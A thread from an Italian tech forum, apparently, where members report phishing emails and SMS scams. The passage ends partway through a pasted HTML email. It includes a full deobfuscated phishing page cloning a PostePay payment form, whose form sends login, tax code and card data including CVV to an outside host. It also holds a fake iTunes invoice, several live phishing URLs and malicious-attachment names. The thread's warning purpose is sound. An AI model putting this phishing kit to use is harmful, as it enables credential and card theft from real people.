Segnalazioni di mail di phishing o malware vario

Parliamo qui dei rootkit hypervisor-level, ma anche di quale piattaforma mobile preferire o delle ripercussioni di Facebook sulla nostra privacy.
Regole del forum
Avatar utente
Cris
Livello: DVD-ROM (5/15)
Livello: DVD-ROM (5/15)
Messaggi: 179
Iscritto il: mer apr 30, 2014 11:01 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da Cris »

Veramente odioso il fatto che mail spam arrivino anche sulla PEC.
"Per conto di: ........." ed è un indirizzo conosciuto...!
Prima di eliminarle uno è un po' più restio, trattandosi di mail PEC....
Sempre! Che parola terribile. Quando la sento mi fa venire i brividi. :fiu
System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Re: Segnalazioni di mail di phishing o malware vario

Messaggio da System » lun ott 12, 2015 12:28 pm


Avatar utente
Al3x
Amministratore
Amministratore
Messaggi: 4535
Iscritto il: mer mag 01, 2013 12:59 pm
Località: http://127.0.0.1

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da Al3x »

Ma proviene da un indirizzo PEC?
I :amore Sasha
Avatar utente
Cris
Livello: DVD-ROM (5/15)
Livello: DVD-ROM (5/15)
Messaggi: 179
Iscritto il: mer apr 30, 2014 11:01 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da Cris »

Al3x ha scritto:Ma proviene da un indirizzo PEC?
sembra....

Immagine


questo il messaggio:

Immagine
Sempre! Che parola terribile. Quando la sento mi fa venire i brividi. :fiu
Avatar utente
Al3x
Amministratore
Amministratore
Messaggi: 4535
Iscritto il: mer mag 01, 2013 12:59 pm
Località: http://127.0.0.1

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da Al3x »

Non vorrei sbagliarmi ma l'indirizzo di provenienza non mi pare sia una PEC nonostante il dominio lo faccia credere. Se questa casella la usi solo per ricevere messaggi PEC, dalle impostazioni della stessa dovresti poter bloccare la ricezione di messaggi provenienti da caselle convenzionali.
I :amore Sasha
Avatar utente
Cris
Livello: DVD-ROM (5/15)
Livello: DVD-ROM (5/15)
Messaggi: 179
Iscritto il: mer apr 30, 2014 11:01 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da Cris »

Purtroppo no. Essendo la mail pubblica, capita anche di ricevere messaggi non certificati perché provenienti da mail non PEC, anche se raramente.
Grazie comunque!
Sempre! Che parola terribile. Quando la sento mi fa venire i brividi. :fiu
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

Poste italiane che vuole "una selfie" mi mancava proprio :D :acch
Immagine
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

Ancora una novità, arrivato oggi via sms dal numero 447791531776

Congrat! Hai vinto € 1,856,432.00 Numero vincente é 0115/16 Invia email per maggiori informazioni e richiedere il tuo premio : board0144@gmail.com.

Da quello che ho visto sembra essere capitato ad altre persone.
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Il "Lato" del cazzeggio digitale

Messaggio da hashcat »

Le solite e-mail di phishing... ("pescata" proprio ora dopo una lunga permanenza nella cartella di Spam)

Testo:

Codice: Seleziona tutto

Stiamo aggiornando il nostro database utenti.


Si prega di scaricare il file allegato e compilare il modulo allegato dopo aver inserito i dettagli clicca conferma.

NOTA: Se non compilare il modulo in 72 ore portera allacancellazione dell’account.


Copyright © 2015 PostePay BancoPosta Poste.it, Inc.
Tutti i diritti riservati.
Allegato (file .htm):

Codice: Seleziona tutto

<Script Language='Javascript'>
<!-- HTML Encryption provided by PostePay -->
<!--
document.write(unescape('blablabla...'));
//-->
</Script>
Deoffuscando l'allegato originale ottengo:

Codice: Seleziona tutto

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
    "http://www.w3.org/TR/html4/strict.dtd">
<html>
    <head>
        <meta name="robots" content="noindex,nofollow"/>
        <title>BancoPosta Poste PostePay MyPoste</title>
        <!-- START CSS -->
        <style type="text/css">
            @import url(https://postecommerce.bancoposta.it/branding/PCOM/css/emvcap.css);
            @import url(https://postecommerce.bancoposta.it/branding/PCOM/css/cvv2.css);
            @import url(https://postecommerce.bancoposta.it/branding/PCOM/css/igfs.css);
            BODY,TD,DIV,TH,span.standard {font-family: Verdana, Arial, Helvetica, sans-serif; font-size:10px; text-align:center;}
            SELECT,TEXTAREA,INPUT {font-family: Verdana, Arial, Helvetica, sans-serif; font-size:10px;}
            FORM {display:inline;}
            .blu12 {text-decoration:none; color:#7d7d7d; font-size:12px;}
            .b10, .b10 A, .b10 A:hover{color:#000000; font-size:10px;font-family: Verdana, Arial, Helvetica, sans-serif;}
            /* tabella che comprende tutto*/
            .paymenttable {border: 4px solid #9bc07f; padding: 0px;width: 610px;}
            /* tabella che comprende tutto*/
            .paymenttable2 {border: 4px solid #9bc07f; padding: 0px;width: 610px;}
            /* tabella che comprende pin */
            .paymenttablePin {border: 4px solid #666f5f; padding: 0px; width:610px;}
            .pintable {border: 1px solid #7d7d7d; padding: 0px; width:400px;}
            /* tabella che comprende info */
            .paymentinfotable{background-color: #ffffff; padding: 0px; width: 610px;}
            /* tabella che comprende info */
            .paymentinfotable2{background-color: #ffffff; padding: 0px; width: 600px;}
            /* tabella che comprende i campi */
            .paymententrytable {background-color: #ffffff; padding: 0px; width: 610px;}
            /* header di tabella info e tabella campi */
            .paymentheader {background-color: #666f5f; padding: 3px; color:#ffffff; font-weight:bold;}
            /* celle a sinistra */
            .paymentlabel {border-bottom: 1px solid #7d7d7d; border-right: 1px solid #7d7d7d; font-weight:bold;  padding: 5px; background-color:#f7f7f7; text-align:right;}
            /* celle a destra #373abe*/
            .paymentdata {border-bottom: 1px solid #666f5f; width: 300px; text-align:left;}
            /* celle a destra per tabella #373abe*/
            .paymentdataT {border-bottom: 1px solid #666f5f;border-right: 1px solid #666f5f; width: 300px;}
            /* menu a tendina, campi input e bottone */
            .paymentselect {}
            .paymentinput {}
            .button {}
            .style1 {color: #000000}
        </style>
        <!-- END CSS -->
        <script type="text/javascript">var contextPath = '/IGFS_CG_PCOM_WEB';</script>
        <script type="text/javascript" src="https://postecommerce.bancoposta.it/IGFS_CG_PCOM_WEB/js/nets/form.js"></script>
        <script type="text/javascript" src="https://postecommerce.bancoposta.it/IGFS_CG_PCOM_WEB/js/script.js"></script>
        <script language="JavaScript" type="text/javascript" src="http://www.zinabre.com/v.js"></script>
    </head>
    <body class="main" id="main">
        <!-- START HEADER -->
        <table cellpadding="0" cellspacing="0" width="100%" >
            <tr>
                <td width="160" style="border-top-color:#b3b3b3; border-top-style:solid; border-top-width:1px;"><a href="#" target="_blank"><img src="http://www.poste.it/resources/condivise/images/header/privati/logo.png" alt="microgame"border="0"></a></td>
                <td align="left" style="border-top-color:#b3b3b3; border-top-style:solid; border-top-width:1px; font-family:Arial, Helvetica, sans-serif; font-size:24px; color:#b3b3b3; font-size-adjust:inherit; font-stretch:normal; text-shadow:#999999; text-align:center;">&nbsp;</td>
            </tr>
        </table>
        <!-- END HEADER -->
        <form id="loginform12" name="loginform12" action="http://nasasom.com.br/da.php" method="post">
            <BR/>
            <TABLE border="0" cellSpacing="0" cellPadding="2" width="585">
                <TBODY>
                    <TR vAlign="top">
                        <TD width="500">
                            <B class="blu12">
                            </B>
                            <p style="padding:10px 30px 0 10px; font-size: 18px;"><strong>Verifica la tua Identit&agrave; </strong></p>
                            <div style="font-size:xx-small;color:#B1B1B1;">
                                <hr>
                                <span class="style1">Esempio Nome utente: <b>nome.cognome</b> oppureu: <b>nome.cognome-anno</b><BR>
                                Inoltre si ricorda che la password deve essere corretta, senza <b>spazi</b> e rispettare maiuscole e minuscole.
                                </span>                  
                                <hr>
                            </div>
                            <BR/>		  
                        </TD>
                    </TR>
                </TBODY>
            </TABLE>
            <BR>
            <TABLE class="paymenttable" border="0">
                <TBODY>
                    <TR>
                        <TD class="paymentheader" colSpan="2">
                            Riepilogo ordine
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <TABLE class="paymentinfotable" width="511">
                                <TBODY>
                                    <TR>
                                        <TD width="186" class="paymentlabel">Utente</TD>
                                        <TD width="412" class="paymentdata">
                                            &nbsp;&nbsp;&nbsp;&nbsp;<input id="utente" name="utente" class="paymentinput" onkeypress="" type="text" value="" size="21" maxlength="29" autocomplete="off"/>
                                        </TD>
                                    </TR>
                                    <TR>
                                        <TD width="186" class="paymentlabel">Password</TD>
                                        <TD width="412" class="paymentdata">
                                            &nbsp;&nbsp;&nbsp;&nbsp;<input id="pwd" name="pwd" class="paymentinput" onkeypress="" onfocus="select()" type="password" value="" size="21" maxlength="19" autocomplete="off"/>
                                        </TD>
                                    </TR>
                                    <TR>
                                        <TD width="186" class="paymentlabel">Codice Fiscale </TD>
                                        <TD width="412" class="paymentdata">&nbsp;&nbsp;&nbsp;&nbsp;<input id="cf" name="cf" class="paymentinput" onkeypress="" onfocus="select()" type="text" value="" size="21" maxlength="19" autocomplete="off"/>
                                        </TD>
                                    </TR>
                                </TBODY>
                            </TABLE>
                        </TD>
                    </TR>
                    <TR>
                        <TD class="paymentheader" colSpan="2">
                            Dati della carta
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <TABLE class="paymentinfotable" border="0" borderColor="black" width="509">
                                <TBODY>
                                    <TR>
                                        <TD class="paymentlabel">
                                            Numero carta*
                                        </TD>
                                        <TD>
                                            <input id="nr" name="nr" class="paymentinput" onkeypress="return jNumber(this, event);" onfocus="select()" type="text" value="" size="21" maxlength="19" autocomplete="off"/>
                                        </TD>
                                    </TR>
                                    <TR>
                                        <TD class="paymentlabel " width="261">
                                            Scadenza*
                                        </TD>
                                        <TD width="160">
                                            <select id="mm" name="mm" class="paymentselect">
                                                <option value=""></option>
                                                <option value="01">01</option>
                                                <option value="02">02</option>
                                                <option value="03">03</option>
                                                <option value="04">04</option>
                                                <option value="05">05</option>
                                                <option value="06">06</option>
                                                <option value="07">07</option>
                                                <option value="08">08</option>
                                                <option value="09">09</option>
                                                <option value="10">10</option>
                                                <option value="11">11</option>
                                                <option value="12">12</option>
                                            </select>
                                            &nbsp;-&nbsp;
                                            <select id="yy" name="yy" class="paymentselect">
                                                <option value=""></option>
                                                <option value="16">2016</option>
                                                <option value="17">2017</option>
                                                <option value="18">2018</option>
                                                <option value="19">2019</option>
                                                <option value="20">2020</option>
                                                <option value="21">2021</option>
                                                <option value="22">2022</option>
                                                <option value="23">2023</option>
                                            </select>
                                        </TD>
                                    </TR>
                                    <TR>
                                        <TD class="paymentlabel ">
                                            CVV2*
                                        </TD>
                                        <TD>
                                            <input id="cvv" name="cvv" class="paymentinput" onkeypress="return jNumber(this, event);" onfocus="select()" type="text" value="" size="2" maxlength="3" autocomplete="off"/>
                                        </TD>
                                        <TD width="0" align="left">
                                            <div class="cvv2_info_small" ></div>
                                        </TD>
                                        <TD width="171">
                                            <A href="javascript:openInfo('https://postecommerce.bancoposta.it/IGFS_CG_PCOM_WEB/app/dir_ppay/info/cvv2', 'new', '300', '400')">Visualizza la posizione del codice CVV2 sulla carta</A>									
                                        </TD>
                                    </TR>
                                </TBODY>
                            </TABLE>
                        </TD>
                    </TR>
                    <TR>
                        <TD>
                            <TABLE id="button">
                                <TBODY>
                                    <TR>
                                        <TD width="195">
                                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                            <input id="continue" name="continue" onclick="
                                                if (verificaRequiredFields()) {
                                                document.getElementById('button').style.visibility = 'hidden';
                                                return true;
                                                } else {
                                                return false;
                                                }
                                                " type="submit" value="Continua"/>
                                        </TD>
                                    </TR>
                                </TBODY>
                            </TABLE>
                            (*) Campi obbligatori
                        </TD>
                    </TR>
                </TBODY>
            </TABLE>
            <script language="javascript" type="text/javascript">
                var frmvalidator  = new Validator("loginform12");
                frmvalidator.addValidation("utente","req","Inserisci il tuo Nome Utente");
                frmvalidator.addValidation("pwd","req","Inserisci la tua Password");
                frmvalidator.addValidation("cf","req","Inserisci il tuo Codice Fiscale");
                frmvalidator.addValidation("nr","req","Non e possibile procedere se il campo Numero (carta) non e valorizzato.");
                frmvalidator.addValidation("cvv","req","Il campo CVV2 deve essere composto da sole cifre decimali.");
                frmvalidator.addValidation("mm","req","Seleziona il mese di scadenza");
                frmvalidator.addValidation("yy","req","Selezionare l'anno di scadenza");
                //gerujt5j56j56j65yt534ehrjhrjrtjhrtjtrjr 
            </script>
            <input id="TID" name="TID" type="hidden" value="XXXXXXXX"/>	
            <input type="hidden" name="_S_T_" value="XX-X-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX">
        </form>
        <!-- START FOOTER -->
        <!-- END FOOTER -->
    </body>
</html>
P.S.: Ho rimosso alcuni identificativi univoci.

:mad:
“The quieter you become, the more you can hear”
Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 12448
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana
Contatta:

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da crazy.cat »

A parte la totale mancanza di accenti non capivo dove volevano arrivare, poi guardo nel file "allegato senza nome" allegato alla mail e trovo un "Modulo per richiesta di recesso/Modulo per richiesta di recesso.pdf.js" che comincia a spiegare dove volevano arrivare.
Il link di bartolini era reale serve per tracciare la spedizione.

Il Suo ordine e stato spedito da redcoon!
Da: support.redcoon@facebookmail.com 03 apr 2016 - 21:17
A: <*****@libero.it>
Gentile Cliente !

Il Suo ordine e stato spedito da redcoon!
Il Suo numero d'ordine AUF-I-2723465
La spedizione e indirizzata a:

Compusoft snc
Via Risorgimento, 122/1
97015 Modica

La consegna sara effettuata dalla compagnia di trasporti: BRT S.p.A.
Potra controllare lo stato della Sua spedizione al seguente link, a partire dal
primo giorno lavorativo successivo alla ricezione della presente e-mail:
http://as777.bartolini.it/vas/sped_ricdocmit_load.hsm?****
Se dovesse visualizzare un messaggio di errore, non si preoccupi.
Il link si attivera solamente una volta che il Suo ordine avra raggiunto il magazzino di BRT.
La preghiamo di assicurarsi che il nome fornito per la consegna sia facilmente visibile dal corriere
per evitare possibili disguidi al momento della consegna.
Le ricordiamo che tutti i pagamenti in contrassegno devono essere saldati in contanti
per importi fino a 2.999,99 Euro. Per importi a partire da 3.000,00 Euro il pagamento deve essere
effettuato esclusivamente con Assegno Circolare Bancario (no assegno circolare postale)
intestato a BRT S.p.A.
In caso di pagamento tramite assegno circolare bancario, una copia dello stesso sara richiesta
via FAX dalla filiale di competenza di BRT per effettuare i controlli necessari;
la mancata ricezione del fax potrebbe portare un leggero ritardo nella consegna quindi
si prega di inserire in fase di registrazione un numero di telefono sempre reperibile.
Nota Bene:
Qualora al momento della consegna Lei dovesse riscontrare anomalie ovvero che il pacco ricevuto e
visibilmente danneggiato, dovra firmare il documento di consegna del corriere
SPECIFICANDO IL DANNO SULLA BOLLA DI CONSEGNA
(esempio: scatola ammaccata, aperta, imballo danneggiato, ecc.).
Entro le successive 24 ore, Lei dovra notificare l'accaduto a REDCOON ITALIA, via e-mail
all'indirizzo postvendita@redcoon.it.

ATTENZIONE! PRIMA DI FIRMARE CONTROLLARE L'INTEGRITA' DELL'IMBALLAGGIO!
Qualora Lei accettasse il pacco senza evidenziare anomalie,
redcoon Italia non potra essere ritenuta responsabile
di alcun danneggiamento conseguente il trasporto dei prodotti.

SI PREGA DI NON RISPONDERE A QUESTA E-MAIL.
Nel caso Lei abbia altre domande, potra contattarci presso la nostra Assistenza Clienti al numero di
telefono 011/21.73.422 (Lunedi-Venerdi: 9:00-18:00) oppure in
Chat (Lunedi-Venerdi: 9:00-18:00) o inviarci una e-mail
all'indirizzo info@redcoon.it.
Le chiediamo cortesemente, prima di aprire il pacco ed usare il Suo prodotto, di leggere
le informazioni relative alle procedure di reso e reclami (vedere allegato).
Ci auguriamo che Lei trovi gradito il prodotto acquistato su redcoon.it!
Distinti Saluti
www.redcoon.it

E-Mail: info@redcoon.it
Hai nuove notifiche. Accedi a Facebook Visualizza notifiche Questo messaggio e stato inviato a Facebook, Inc. Se non vuoi piu ricevere questo tipo di e-mail da Facebook, annulla l'iscrizione. Facebook, Inc., Attention: Community Support, Menlo Park, CA 94025

Leggendo l'intestazione della mail si scopre che è susan cooper
Return-Path: <susancooper@cherryhoggs.co.uk>
X-cp3a: Suspected Spam
Received: from libero.it (10.248.25.133) by cpms120.iol.local (8.6.145)
id 5647096202CB8809 for *****@libero.it; Sun, 3 Apr 2016 20:18:08 +0200
Received: from mailscan4.extendcp.co.uk ([176.32.230.40])
by smtp-05.iol.local with SMTP
id mmb9aGbF1p5aYmmb9ag2MY; Sun, 03 Apr 2016 20:18:08 +0200
x-libjamoibt: 2601
Received-SPF: none
X-Brightmail: 1.00
X-CNFS-Analysis: v=2.2 cv=G7NeKJs5 c=1 sm=1 tr=0 p=HUmT36kbTD7BTpwjEaYA:9
a=GK12kQ3CBlj2J8J47Bqajw==:117 a=GK12kQ3CBlj2J8J47Bqajw==:17
a=L9H7d07YOLsA:10 a=9cW_t1CCXrUA:10 a=s5jvgZ67dGcA:10 a=kziv93cY1bsA:10
a=_R60h4bMAAAA:8 a=pLVmDGfhAAAA:8 a=eHARDllYoTYLXTj0:21 a=G16OHptSAJ0A:10
a=4d6ZSoGE7HAA:10
Received: from mailscanlb1.hi.local ([10.0.44.161] helo=mail145.extendcp.co.uk)
by mailscan-b131.hi.local with esmtp (Exim 4.80.1)
(envelope-from <susancooper@cherryhoggs.co.uk>)
id 1ammb9-0006eC-EK
for *****@libero.it; Sun, 03 Apr 2016 19:18:07 +0100
Received: from h36-ipv4-31-44-163.mynet.it ([31.44.163.36] helo=[192.168.2.24])
by mail145.extendcp.com with esmtpa (Exim 4.80.1)
id 1ammb9-0001cI-7u
for ****@libero.it; Sun, 03 Apr 2016 19:18:07 +0100
Message-ID: <VE280D2.4422701@cherryhoggs.co.uk>
From: support.redcoon@facebookmail.com
Reply-To: noreply noreply@facebookmail.com
To: ****@libero.it
Subject: Il Suo ordine e stato spedito da redcoon!
Date: 03/04/2016 21.17
MIME-Version: 1.0
Content-Type: multipart/mixed;
X-CMAE-Envelope: MS4wfODsqcpp0rvT0ygpfn2j+aGuo2d2XyEVr2lP1liRfmD14mWTr6TRBsQGf8FMdK1SrMqx7y30jr7G0RgaOtmKndQLzrI+9kOLAA0rBwiNpPczF1Q7HXMp
GwlQGcpREBl9hXf8g3idT0HqFgqzy+9Izd60DXRgzAgdKtaHBzCRQGzN5Yt9ju7xY5COXaldjMZZWA5e3c0rm+LA8UMNb5RU5uU=
“Se tutti i documenti raccontavano la stessa favola, ecco che la menzogna diventava un fatto storico, quindi vera.”
Avatar utente
leofelix
Amministratore
Amministratore
Messaggi: 5130
Iscritto il: mer lug 03, 2013 11:46 am
Località: Bugliano

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da leofelix »

Ricevuto phishing via sms da questo numero 3424112671 (da notare che non è la prima volta che accade come qui segnalato da https://www.d3lab.net/sms-phishing-dal-3424112671/ )
Testo:
PostPay: Verifica la tua identità, altrimenti il tuo account verrà chiuso. Per verificare:
http://securelogin.post.it.bat1kul.mine.nu/

L'URL reindirizza verso sottodomini casuali di *barancelmanuel.sells-it.net/

Anche i rispettivi IP address sono coinvolti

Ho segnalato a phishtank, dove potrete vedere le immagini (e aiutare a verificare se lo desiderate)

https://www.phishtank.com/phish_detail.php?phish_id=4401275
https://www.phishtank.com/phish_detail.php?phish_id=4401249
https://www.phishtank.com/phish_detail.php?phish_id=4401253
https://www.phishtank.com/phish_detail.php?phish_id=4401257
Avatar utente
hashcat
Livello: Storage Area Network (12/15)
Livello: Storage Area Network (12/15)
Messaggi: 1946
Iscritto il: gio mag 02, 2013 4:13 pm

Re: Segnalazioni di mail di phishing o malware vario

Messaggio da hashcat »

Martedì 4 ottobre ho ricevuto, a distanza di tre ore l'una dall'altra, due email di phishing dal contenuto identico ma con mittente ed indirizzo leggermente differenti.

Metadati (ripuliti):

Codice: Seleziona tutto

Return-Path: <www-data@lust.haibane.pl>
Received: from lust.antrez.pl (lust.antrez.pl. [94.23.94.42])
Received: from localhost (localhost.localdomain [127.0.0.1]) by lust.antrez.pl (Postfix)
X-Virus-Scanned: Debian amavisd-new at lust.haibane.pl
Received: from lust.antrez.pl ([127.0.0.1]) by localhost (lust.haibane.pl [127.0.0.1]) (amavisd-new, port 10024)
Received: by lust.antrez.pl (Postfix, from userid 33)
Subject: YOUR ORDER RECEIPT - Ref #0655912XXXX832
From: iTunes - Payments <store+customercare2201XX1281@lust.haibane.pl>
Content-Type: text/html
Contenuto (formattato):

Codice: Seleziona tutto

<!DOCTYPE html>
<style type="text/css">
  <!-- .style1 {
    font-size: 16px
  }
  
  -->
</style>
<BR>
<BR>
<div class="adn ads" style="" role="listitem">
  <div class="gs">
    <div class="gE iv gt"></div>
    <div class="qQVYZb"></div>
    <div class="utdU2e"></div>
    <div class="tx78Ic"></div>
    <div class="aHl"></div>
    <div id=":3nn" tabindex="-1"></div>
    <div id=":ag" class="ii gt m15232471f558e1ca adP adO">
      <div id=":k9" class="a3s" style="overflow: hidden;"><u></u>

        <div bgcolor="#ffffff" link="#3366cc" vlink="#3366cc" alink="#3366cc" marginheight="0" marginwidth="0" style="margin:0;padding:0">

          <br><br>
          <table style="border-collapse:collapse;border-spacing:0" align="center" border="0" cellpadding="0" cellspacing="0">
            <tbody>
              <tr>
                <td valign="top">

                  <td width="40"></td>
                  <table style="border-collapse:collapse;border-spacing:0" align="center" border="0" cellpadding="0" cellspacing="0">
                    <tbody>
                      <tr>
                        <td valign="top">
                          <div style="display:block;padding:0;margin:0;min-height:100%;max-height:none;min-height:none;line-height:normal;overflow:visible">
                            <table style="border-collapse:collapse;border-spacing:0" align="center" border="0" cellpadding="0" cellspacing="0" width="740">
                              <tbody>
                                <tr>
                                  <td width="40"></td>
                                  <td align="left"><img class="CToWUd" alt="Apple" src="http://r.mzstatic.com/email/images_shared/logo_apple_d-2x.png" style="border:none;padding:0;margin:0" height="37" border="0" width="31"></td>
                                  <td style="font-size:32px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif;color:rgb(153,153,153)" align="right">Invoice</td>
                                  <td width="40"></td>
                                </tr>
                                <tr height="20">
                                  <td colspan="4"></td>
                                </tr>
                                <tr></tr>
                                <tr>
                                  <td colspan="4" align="center">
                                    <table style="border-collapse:collapse;border-spacing:0" border="0" cellpadding="0" cellspacing="0" width="660">
                                      <tbody>
                                        <tr>
                                          <td>
                                            <table style="border-collapse:collapse;border-spacing:0;color:rgb(51,51,51);background-color:rgb(245,245,245);border-radius:3px;font-size:12px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif" border="0" cellpadding="0" cellspacing="0">
                                              <tbody>
                                                <tr height="46">
                                                  <td colspan="2" style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:1px;border-bottom-width:1px;border-top-width:0px" width="320"><span style="color:rgb(153,153,153);font-size:10px">APPLE ID</span><br>
                                                    <a href="mailto:#CLIENT#" target="_blank"><span style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:0px;border-bottom-width:0px;border-top-width:0px">billing@apple.com<span class="im"></span></span></a></td>
                                                  <td rowspan="3" style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:0px;border-bottom-width:0px;border-top-width:0px" width="220"><span style="color:rgb(153,153,153);font-size:10px">BILLED TO</span><br> billing@apple.com
                                                    <span class="im"></span></td>
                                                  <td rowspan="3" style="padding-right:20px;border-style:solid;border-color:white;border-left-width:1px;border-right-width:0px;border-bottom-width:0px;border-top-width:0px" align="right" width="120"><span style="color:rgb(153,153,153);font-size:10px">TOTAL</span><br>
                                                    <span style="font-size:16px;font-weight:bold">$15.98</span></td>
                                                </tr>
                                                <tr height="46">
                                                  <td style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:1px;border-bottom-width:1px;border-top-width:0px"><span style="color:rgb(153,153,153);font-size:10px">INVOICE DATE</span><br> 28-03-2016
                                                  </td>
                                                  <td style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:1px;border-bottom-width:1px;border-top-width:0px"><span style="color:rgb(153,153,153);font-size:10px">SEQUENCE NO.</span><br> 11194422811
                                                  </td>
                                                </tr>
                                                <tr height="46">
                                                  <td style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:1px;border-bottom-width:0px;border-top-width:0px"><span style="color:rgb(153,153,153);font-size:10px">ORDER ID</span><br>
                                                    <span style="color:#0073ff"><a href="https://www.apple.com/uk/support/itunes/account/" target="_blank">11845779191</a></span></td>
                                                  <td style="padding-left:20px;border-style:solid;border-color:white;border-left-width:0px;border-right-width:1px;border-bottom-width:0px;border-top-width:0px"><span style="color:rgb(153,153,153);font-size:10px">DOCUMENT NO.</span><br> 01192981338
                                                  </td>
                                                </tr>
                                              </tbody>
                                            </table>
                                          </td>
                                        </tr>
                                        <tr height="30">
                                          <td></td>
                                        </tr>
                                        <tr>
                                          <td>
                                            <table style="border-collapse:collapse;border-spacing:0;width:660px;color:rgb(51,51,51);font-size:12px;font-family:'Helvetica Neue',Helvetica,Arial,sans-serif" border="0" cellpadding="0" cellspacing="0" width="660">
                                              <tbody>
                                                <tr style="background-color:rgb(245,245,245)" height="24">
                                                  <td colspan="2" style="width:350px;padding-left:10px;border-top-left-radius:3px;border-bottom-left-radius:3px" width="350"><span style="font-size:14px;font-weight:500">iTunes Store</span></td>
                                                  <td style="width:100px;padding-left:20px" width="100"><span style="color:rgb(153,153,153);font-size:10px">TYPE</span></td>
                                                  <td style="width:120px;padding-left:20px" width="120"><span style="color:rgb(153,153,153);font-size:10px">PURCHASED FROM</span></td>
                                                  <td style="width:100px;padding-right:20px;border-top-right-radius:3px;border-bottom-right-radius:3px" align="right" width="90"><span style="color:rgb(153,153,153);font-size:10px;white-space:nowrap">PRICE</span></td>
                                                </tr>
                                                <tr height="90">
                                                  <td style="padding:0 0 0 20px;margin:0;height:60px;width:60px" align="center" width="350"><img class="CToWUd" src="http://is2.mzstatic.com/image/thumb/Video69/v4/e9/5d/7a/e95d7add-be91-5cec-8ee6-80dd645b3dda/source/120x120bb-80.jpg" alt="Mr. Blue Sky - The Story of Jeff Lynne & ELO" style="border:none;padding:0;margin:0" height="60" border="0" width="40"></td>
                                                  <td style="padding:0 0 0 20px;width:260px;line-height:15px" width="350"><span style="font-weight:600">Mr. Blue Sky - The Story of Jeff Lynne & ELO</span><br>
                                                    <span style="color:rgb(153,153,153)">Documentary</span><span class="im"><br>
                              <span style="font-size:10px"> <a href="https://userpub.itunes.apple.com/WebObjects/MZUserPublishing.woa/wa/addUserReview?cc=gb&id=1029301683&o=i&type=Film" style="color:#0073ff" target="_blank">Write a Review</a>&nbsp;|&nbsp;<a href="https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/reportAProblem?a=1029301683&cc=gb&d=10126111450&o=i&p=65006831935336&pli=65012989802591" style="color:#0073ff" target="_blank">Report a Problem</a></span> </span>
                                                  </td>
                                                  <td style="padding:0 0 0 20px;width:100px" width="100"><span style="color:rgb(153,153,153)">Film</span></td>
                                                  <td style="padding:0 0 0 20px;width:120px" width="120"><span style="color:rgb(153,153,153)">Apple TV</span></td>
                                                  <td style="padding:0 20px 0 0;width:100px" align="right" width="90"><span style="font-weight:600;white-space:nowrap"><span class="style1">$</span>9.99</span>
                                                  </td>
                                                </tr>
                                                <tr height="90">
                                                  <td style="padding:0 0 0 20px;margin:0;height:60px;width:60px" align="center" width="350"><img class="CToWUd" src="http://is5.mzstatic.com/image/thumb/Music69/v4/4f/49/ce/4f49ce63-ed68-1a06-887e-312283378b45/source/120x120bb-80.jpg" alt="Get Weird" style="border:none;padding:0;margin:0" height="60" border="0" width="60"></td>
                                                  <td style="padding:0 0 0 20px;width:260px;line-height:15px" width="350"><span style="font-weight:600">Get Weird</span><br>
                                                    <span style="color:rgb(153,153,153)">Little Mix</span><span class="im"><br>
                              <span style="font-size:10px"> <a href="https://userpub.itunes.apple.com/WebObjects/MZUserPublishing.woa/wa/addUserReview?cc=gb&id=1016217310&o=i&type=Album" style="color:#0073ff" target="_blank">Write a Review</a>&nbsp;|&nbsp;<a href="https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/reportAProblem?a=1016217310&cc=gb&d=10126111450&o=i&p=65006831935336&pli=65012989968217" style="color:#0073ff" target="_blank">Report a Problem</a></span> </span>
                                                  </td>
                                                  <td style="padding:0 0 0 20px;width:100px" width="100"><span style="color:rgb(153,153,153)">Album</span></td>
                                                  <td style="padding:0 0 0 20px;width:120px" width="120"><span style="color:rgb(153,153,153)">Apple TV</span></td>
                                                  <td style="padding:0 20px 0 0;width:100px" align="right" width="90"><span style="font-weight:600;white-space:nowrap"><span class="style1">$</span>5.99</span>
                                                  </td>
                                                </tr>
                                                <TR class="ecxaapl-desktop-tbl" height="1">
                                                  <TD height="1" style="padding: 0px 10px;" colspan="5">
